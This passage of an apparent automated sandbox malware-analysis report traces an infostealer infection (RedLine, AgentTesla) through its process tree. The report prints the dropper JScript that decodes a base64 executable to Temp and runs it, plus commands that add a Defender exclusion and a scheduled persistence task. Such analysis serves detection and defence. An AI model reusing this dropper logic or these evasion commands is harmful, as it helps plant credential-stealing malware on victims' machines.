                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:13
                                                                                  Start time:03:21:31
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:3'657'539 bytes
                                                                                  MD5 hash:E7114D96EC31D8CD1C0233BD949D1E0F
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:14
                                                                                  Start time:03:21:35
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0xfe0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:15
                                                                                  Start time:03:21:35
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:3'657'539 bytes
                                                                                  MD5 hash:E7114D96EC31D8CD1C0233BD949D1E0F
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:16
                                                                                  Start time:03:21:38
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                  Imagebase:0xfe0000
                                                                                  File size:46'504 bytes
                                                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000010.00000002.1731769518.0000000003189000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000010.00000002.1731769518.0000000003112000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:17
                                                                                  Start time:03:21:39
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                  Imagebase:0xea0000
                                                                                  File size:231'936 bytes
                                                                                  MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:18
                                                                                  Start time:03:21:39
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                  Imagebase:0xe60000
                                                                                  File size:250'368 bytes
                                                                                  MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000000.1724575722.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000000.1724575722.0000000000E62000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: Joe Security
                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: C:\Users\user\AppData\Local\Temp\neworigin.exe, Author: ditekSHen
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 79%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  Target ID:19
                                                                                  Start time:03:21:40
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Local\Temp\build.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\build.exe"
                                                                                  Imagebase:0xf40000
                                                                                  File size:307'712 bytes
                                                                                  MD5 hash:3B6501FEEF6196F24163313A9F27DBFD
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000013.00000002.1941971499.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000002.1941971499.00000000032D6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000013.00000000.1729162835.0000000000F42000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\build.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 92%, ReversingLabs
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:20
                                                                                  Start time:03:21:42
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                                                                                  Imagebase:0x340000
                                                                                  File size:433'152 bytes
                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:21
                                                                                  Start time:03:21:42
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe" /st 03:26 /du 23:59 /sc daily /ri 1 /f
                                                                                  Imagebase:0xa80000
                                                                                  File size:187'904 bytes
                                                                                  MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:22
                                                                                  Start time:03:21:42
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6ee680000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:23
                                                                                  Start time:03:21:42
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6ee680000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:24
                                                                                  Start time:03:21:43
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                  Imagebase:0x70000
                                                                                  File size:231'936 bytes
                                                                                  MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 100%, Avira
                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                  • Detection: 83%, ReversingLabs
                                                                                  Has exited:false

                                                                                  Target ID:25
                                                                                  Start time:03:21:43
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp6964.tmp.cmd""
                                                                                  Imagebase:0xa40000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:26
                                                                                  Start time:03:21:43
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff6ee680000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:27
                                                                                  Start time:03:21:43
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:timeout 6
                                                                                  Imagebase:0x5f0000
                                                                                  File size:25'088 bytes
                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:28
                                                                                  Start time:03:21:44
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                  Imagebase:0xfe0000
                                                                                  File size:231'936 bytes
                                                                                  MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:29
                                                                                  Start time:03:21:46
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                  Imagebase:0x7ff605670000
                                                                                  File size:496'640 bytes
                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:31
                                                                                  Start time:03:21:54
                                                                                  Start date:26/09/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                  Imagebase:0x7c0000
                                                                                  File size:231'936 bytes
                                                                                  MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Call Graph


Script (the dropper JavaScript as executed, with the sandbox's recorded return value under each traced call):

var D = new ActiveXObject ( "Microsoft.XMLDOM" );
var E = D.createElement ( "t" );
• createElement("t") ➔
E.dataType = "bin.base64";
E.text = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4...
var b = new ActiveXObject ( "ADODB.Stream" );
var p = new ActiveXObject ( "Scripting.FileSystemObject" ).GetSpecialFolder ( 2 );
• GetSpecialFolder(2) ➔ C:\Users\hubert\AppData\Local\Temp
b.Type = 1;
b.Open ( );
• Open() ➔ undefined
b.Write ( E.nodeTypedValue );
• Write() ➔ undefined
b.SaveToFile ( p + "\\x.exe", 2 );
• SaveToFile("C:\Users\hubert\AppData\Local\Temp\x.exe",2) ➔ undefined
new ActiveXObject ( "WScript.Shell" ).Run ( p + "\\x.exe" );
• Run("C:\Users\hubert\AppData\Local\Temp\x.exe") ➔ 0

                                                                                              Execution Graph

                                                                                              Execution Coverage:3.4%
                                                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                                                              Signature Coverage:9.5%
                                                                                              Total number of Nodes:2000
                                                                                              Total number of Limit Nodes:37
86746->86745 86747 416b24 Sleep 86746->86747 86748 416b39 86747->86748 86748->86745 86748->86746 86749->86683 86751 41377c _free 86750->86751 86752 413753 RtlFreeHeap 86750->86752 86751->86681 86752->86751 86753 413768 86752->86753 86759 417f77 46 API calls __getptd_noexit 86753->86759 86755 41376e GetLastError 86755->86751 86760 417daa 86756->86760 86759->86755 86761 417dc9 setSBCS __call_reportfault 86760->86761 86762 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86761->86762 86765 417eb5 __call_reportfault 86762->86765 86764 417ed1 GetCurrentProcess TerminateProcess 86764->86689 86766 41a208 86765->86766 86767 41a210 86766->86767 86768 41a212 IsDebuggerPresent 86766->86768 86767->86764 86774 41fe19 86768->86774 86771 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86772 421ff8 GetCurrentProcess TerminateProcess 86771->86772 86773 421ff0 __call_reportfault 86771->86773 86772->86764 86773->86772 86774->86771 86775->86693 86777 408f48 ctype 86776->86777 86778 4265c7 VariantClear 86777->86778 86779 408f55 ctype 86777->86779 86778->86779 86779->86698 86836 40ebd0 86780->86836 86840 4182cb 86783->86840 86785 41195e 86847 4181f2 LeaveCriticalSection 86785->86847 86787 40d748 86788 4119b0 86787->86788 86789 4119d6 86788->86789 86790 4119bc 86788->86790 86789->86706 86790->86789 86882 417f77 46 API calls __getptd_noexit 86790->86882 86792 4119c6 86883 417f25 10 API calls wcstoxq 86792->86883 86794 4119d1 86794->86706 86795->86708 86884 401f20 86796->86884 86798 40d5b6 IsDebuggerPresent 86799 40d5c4 86798->86799 86800 42e1bb MessageBoxA 86798->86800 86801 42e1d4 86799->86801 86802 40d5e3 86799->86802 86800->86801 87056 403a50 52 API calls 3 library calls 86801->87056 86954 40f520 86802->86954 86806 40d5fd GetFullPathNameW 86966 401460 86806->86966 86808 40d63b 86809 40d643 86808->86809 86811 42e231 SetCurrentDirectoryW 86808->86811 86810 40d64c 86809->86810 87057 432fee 6 API calls 86809->87057 86981 410390 GetSysColorBrush 
LoadCursorW LoadIconW LoadIconW LoadIconW 86810->86981 86811->86809 86814 42e252 86814->86810 86816 42e25a GetModuleFileNameW 86814->86816 86818 42e274 86816->86818 86819 42e2cb GetForegroundWindow ShellExecuteW 86816->86819 87058 401b10 86818->87058 86823 40d688 86819->86823 86820 40d656 86822 40d669 86820->86822 86825 40e0c0 74 API calls 86820->86825 86989 4091e0 86822->86989 86827 40d692 SetCurrentDirectoryW 86823->86827 86825->86822 86827->86710 86830 42e28d 87065 40d200 52 API calls 2 library calls 86830->87065 86833 42e299 GetForegroundWindow ShellExecuteW 86834 42e2c6 86833->86834 86834->86823 86835 40ec00 LoadLibraryA GetProcAddress 86835->86701 86837 40d72e 86836->86837 86838 40ebd6 LoadLibraryA 86836->86838 86837->86701 86837->86835 86838->86837 86839 40ebe7 GetProcAddress 86838->86839 86839->86837 86841 4182e0 86840->86841 86842 4182f3 EnterCriticalSection 86840->86842 86848 418209 86841->86848 86842->86785 86844 4182e6 86844->86842 86875 411924 46 API calls 3 library calls 86844->86875 86847->86787 86849 418215 __read 86848->86849 86850 418225 86849->86850 86851 41823d 86849->86851 86876 418901 46 API calls __NMSG_WRITE 86850->86876 86854 416b04 __malloc_crt 45 API calls 86851->86854 86860 41824b __read 86851->86860 86853 41822a 86877 418752 46 API calls 6 library calls 86853->86877 86856 418256 86854->86856 86858 41825d 86856->86858 86859 41826c 86856->86859 86857 418231 86878 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 86857->86878 86879 417f77 46 API calls __getptd_noexit 86858->86879 86863 4182cb __lock 45 API calls 86859->86863 86860->86844 86865 418273 86863->86865 86866 4182a6 86865->86866 86867 41827b InitializeCriticalSectionAndSpinCount 86865->86867 86870 413748 _free 45 API calls 86866->86870 86868 418297 86867->86868 86869 41828b 86867->86869 86881 4182c2 LeaveCriticalSection _doexit 86868->86881 86871 413748 _free 45 API calls 86869->86871 86870->86868 86872 418291 86871->86872 86880 417f77 46 API calls 
__getptd_noexit 86872->86880 86876->86853 86877->86857 86879->86860 86880->86868 86881->86860 86882->86792 86883->86794 87066 40e6e0 86884->87066 86888 401f41 GetModuleFileNameW 87084 410100 86888->87084 86890 401f5c 87096 410960 86890->87096 86893 401b10 52 API calls 86894 401f81 86893->86894 87099 401980 86894->87099 86896 401f8e 86897 408f40 VariantClear 86896->86897 86898 401f9d 86897->86898 86899 401b10 52 API calls 86898->86899 86900 401fb4 86899->86900 86901 401980 53 API calls 86900->86901 86902 401fc3 86901->86902 86903 401b10 52 API calls 86902->86903 86904 401fd2 86903->86904 87107 40c2c0 86904->87107 86906 401fe1 86907 40bc70 52 API calls 86906->86907 86908 401ff3 86907->86908 87125 401a10 86908->87125 86910 401ffe 87132 4114ab 86910->87132 86913 428b05 86915 401a10 52 API calls 86913->86915 86914 402017 86916 4114ab __wcsicoll 58 API calls 86914->86916 86917 428b18 86915->86917 86918 402022 86916->86918 86920 401a10 52 API calls 86917->86920 86918->86917 86919 40202d 86918->86919 86921 4114ab __wcsicoll 58 API calls 86919->86921 86922 428b33 86920->86922 86923 402038 86921->86923 86925 428b3b GetModuleFileNameW 86922->86925 86924 402043 86923->86924 86923->86925 86926 4114ab __wcsicoll 58 API calls 86924->86926 86927 401a10 52 API calls 86925->86927 86929 40204e 86926->86929 86928 428b6c 86927->86928 86931 40e0a0 52 API calls 86928->86931 86930 402092 86929->86930 86934 401a10 52 API calls 86929->86934 86939 428b90 _wcscpy 86929->86939 86933 4020a3 86930->86933 86930->86939 86932 428b7a 86931->86932 86935 401a10 52 API calls 86932->86935 86936 428bc6 86933->86936 87140 40e830 53 API calls 86933->87140 86937 402073 _wcscpy 86934->86937 86938 428b88 86935->86938 86944 401a10 52 API calls 86937->86944 86938->86939 86941 401a10 52 API calls 86939->86941 86949 4020d0 86941->86949 86942 4020bb 87141 40cf00 53 API calls 86942->87141 86944->86930 86945 4020c6 86946 408f40 VariantClear 86945->86946 86946->86949 86947 402110 86951 408f40 VariantClear 
86947->86951 86949->86947 86952 401a10 52 API calls 86949->86952 87142 40cf00 53 API calls 86949->87142 87143 40e6a0 53 API calls 86949->87143 86953 402120 ctype 86951->86953 86952->86949 86953->86798 86955 4295c9 setSBCS 86954->86955 86956 40f53c 86954->86956 86958 4295d9 GetOpenFileNameW 86955->86958 87822 410120 86956->87822 86958->86956 86962 40d5f5 86958->86962 86959 40f545 87826 4102b0 SHGetMalloc 86959->87826 86961 40f54c 87831 410190 GetFullPathNameW 86961->87831 86962->86806 86962->86808 86964 40f559 87842 40f570 86964->87842 87904 402400 86966->87904 86968 40146f 86971 428c29 _wcscat 86968->86971 87913 401500 86968->87913 86970 40147c 86970->86971 87921 40d440 86970->87921 86973 401489 86973->86971 86974 401491 GetFullPathNameW 86973->86974 86975 402160 52 API calls 86974->86975 86976 4014bb 86975->86976 86977 402160 52 API calls 86976->86977 86978 4014c8 86977->86978 86978->86971 86979 402160 52 API calls 86978->86979 86980 4014ee 86979->86980 86980->86808 86982 428361 86981->86982 86983 4103fc LoadImageW RegisterClassExW 86981->86983 87941 44395e EnumResourceNamesW LoadImageW 86982->87941 87940 410490 7 API calls 86983->87940 86986 40d651 86988 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 86986->86988 86987 428368 86988->86820 86990 409202 86989->86990 86991 42d7ad 86989->86991 87049 409216 ctype 86990->87049 88213 410940 329 API calls 86990->88213 88216 45e737 90 API calls 3 library calls 86991->88216 86994 409386 86995 40939c 86994->86995 88214 40f190 10 API calls 86994->88214 86995->86823 87055 401000 Shell_NotifyIconW setSBCS 86995->87055 86997 4095b2 86997->86995 86999 4095bf 86997->86999 86998 409253 PeekMessageW 86998->87049 88215 401a50 329 API calls 86999->88215 87001 42d8cd Sleep 87001->87049 87002 4095c6 LockWindowUpdate DestroyWindow GetMessageW 87002->86995 87005 4095f9 87002->87005 87004 42e13b 88234 40d410 VariantClear 87004->88234 87008 42e158 TranslateMessage DispatchMessageW GetMessageW 87005->87008 87008->87008 87009 
42e188 87008->87009 87009->86995 87011 409567 PeekMessageW 87011->87049 87013 44c29d 52 API calls 87054 4094e0 87013->87054 87014 46f3c1 107 API calls 87014->87049 87015 40e0a0 52 API calls 87015->87049 87016 46fdbf 108 API calls 87016->87054 87017 42dcd2 WaitForSingleObject 87021 42dcf0 GetExitCodeProcess CloseHandle 87017->87021 87017->87049 87018 409551 TranslateMessage DispatchMessageW 87018->87011 87020 42dd3d Sleep 87020->87054 88223 40d410 VariantClear 87021->88223 87024 4094cf Sleep 87024->87054 87025 40c620 timeGetTime 87025->87054 87027 40d410 VariantClear 87027->87049 87029 42d94d timeGetTime 88219 465124 53 API calls 87029->88219 87033 42dd89 CloseHandle 87033->87054 87034 47d33e 307 API calls 87034->87049 87035 408f40 VariantClear 87035->87054 87037 465124 53 API calls 87037->87054 87038 42de19 GetExitCodeProcess CloseHandle 87038->87054 87040 401b10 52 API calls 87040->87054 87042 42de88 Sleep 87042->87049 87045 401980 53 API calls 87045->87054 87046 45e737 90 API calls 87046->87049 87049->86994 87049->86998 87049->87001 87049->87004 87049->87011 87049->87014 87049->87015 87049->87017 87049->87018 87049->87020 87049->87024 87049->87027 87049->87029 87049->87034 87049->87046 87050 42e0cc VariantClear 87049->87050 87051 408f40 VariantClear 87049->87051 87049->87054 87942 4091b0 87049->87942 88000 40afa0 87049->88000 88026 408fc0 87049->88026 88061 408cc0 87049->88061 88075 40d150 87049->88075 88080 40d170 87049->88080 88086 4096a0 87049->88086 88217 465124 53 API calls 87049->88217 88218 40c620 timeGetTime 87049->88218 88233 40e270 VariantClear ctype 87049->88233 87050->87049 87051->87049 87054->87013 87054->87016 87054->87025 87054->87033 87054->87035 87054->87037 87054->87038 87054->87040 87054->87042 87054->87045 87054->87049 88220 45178a 54 API calls 87054->88220 88221 47d33e 329 API calls 87054->88221 88222 453bc6 54 API calls 87054->88222 88224 40d410 VariantClear 87054->88224 88225 443d19 67 API calls _wcslen 87054->88225 88226 4574b4 
VariantClear 87054->88226 88227 403cd0 87054->88227 88231 4731e1 VariantClear 87054->88231 88232 4331a2 6 API calls 87054->88232 87055->86823 87056->86808 87057->86814 87059 401b16 _wcslen 87058->87059 87060 4115d7 52 API calls 87059->87060 87063 401b63 87059->87063 87061 401b4b _memmove 87060->87061 87062 4115d7 52 API calls 87061->87062 87062->87063 87064 40d200 52 API calls 2 library calls 87063->87064 87064->86830 87065->86833 87067 40bc70 52 API calls 87066->87067 87068 401f31 87067->87068 87069 402560 87068->87069 87070 40256d __write_nolock 87069->87070 87071 402160 52 API calls 87070->87071 87073 402593 87071->87073 87083 4025bd 87073->87083 87144 401c90 87073->87144 87074 4026f0 52 API calls 87074->87083 87075 4026a7 87076 401b10 52 API calls 87075->87076 87082 4026db 87075->87082 87078 4026d1 87076->87078 87077 401b10 52 API calls 87077->87083 87148 40d7c0 52 API calls 2 library calls 87078->87148 87079 401c90 52 API calls 87079->87083 87082->86888 87083->87074 87083->87075 87083->87077 87083->87079 87147 40d7c0 52 API calls 2 library calls 87083->87147 87149 40f760 87084->87149 87087 410118 87087->86890 87089 42805d 87090 42806a 87089->87090 87205 431e58 87089->87205 87092 413748 _free 46 API calls 87090->87092 87093 428078 87092->87093 87094 431e58 82 API calls 87093->87094 87095 428084 87094->87095 87095->86890 87097 4115d7 52 API calls 87096->87097 87098 401f74 87097->87098 87098->86893 87100 4019a3 87099->87100 87104 401985 87099->87104 87101 4019b8 87100->87101 87100->87104 87811 403e10 53 API calls 87101->87811 87102 40199f 87102->86896 87104->87102 87810 403e10 53 API calls 87104->87810 87106 4019c4 87106->86896 87108 40c2c7 87107->87108 87109 40c30e 87107->87109 87110 40c2d3 87108->87110 87111 426c79 87108->87111 87112 40c315 87109->87112 87113 426c2b 87109->87113 87812 403ea0 52 API calls __cinit 87110->87812 87817 4534e3 52 API calls 87111->87817 87117 40c321 87112->87117 87118 426c5a 87112->87118 87115 426c4b 87113->87115 87116 426c2e 
87113->87116 87815 4534e3 52 API calls 87115->87815 87124 40c2de 87116->87124 87814 4534e3 52 API calls 87116->87814 87813 403ea0 52 API calls __cinit 87117->87813 87816 4534e3 52 API calls 87118->87816 87124->86906 87126 401a30 87125->87126 87127 401a17 87125->87127 87129 402160 52 API calls 87126->87129 87128 401a2d 87127->87128 87818 403c30 52 API calls _memmove 87127->87818 87128->86910 87131 401a3d 87129->87131 87131->86910 87133 411523 87132->87133 87134 4114ba 87132->87134 87821 4113a8 58 API calls 3 library calls 87133->87821 87139 40200c 87134->87139 87819 417f77 46 API calls __getptd_noexit 87134->87819 87137 4114c6 87820 417f25 10 API calls wcstoxq 87137->87820 87139->86913 87139->86914 87140->86942 87141->86945 87142->86949 87143->86949 87145 4026f0 52 API calls 87144->87145 87146 401c97 87145->87146 87146->87073 87147->87083 87148->87082 87209 40f6f0 87149->87209 87151 40f77b _strcat ctype 87217 40f850 87151->87217 87156 427c2a 87246 414d04 87156->87246 87158 40f7fc 87158->87156 87159 40f804 87158->87159 87233 414a46 87159->87233 87163 40f80e 87163->87087 87168 4528bd 87163->87168 87165 427c59 87252 414fe2 87165->87252 87167 427c79 87169 4150d1 _fseek 81 API calls 87168->87169 87170 452930 87169->87170 87752 452719 87170->87752 87173 452948 87173->87089 87174 414d04 __fread_nolock 61 API calls 87175 452966 87174->87175 87176 414d04 __fread_nolock 61 API calls 87175->87176 87177 452976 87176->87177 87178 414d04 __fread_nolock 61 API calls 87177->87178 87179 45298f 87178->87179 87180 414d04 __fread_nolock 61 API calls 87179->87180 87181 4529aa 87180->87181 87182 4150d1 _fseek 81 API calls 87181->87182 87183 4529c4 87182->87183 87184 4135bb _malloc 46 API calls 87183->87184 87185 4529cf 87184->87185 87186 4135bb _malloc 46 API calls 87185->87186 87187 4529db 87186->87187 87188 414d04 __fread_nolock 61 API calls 87187->87188 87189 4529ec 87188->87189 87190 44afef GetSystemTimeAsFileTime 87189->87190 87191 452a00 87190->87191 87192 452a36 87191->87192 87193 
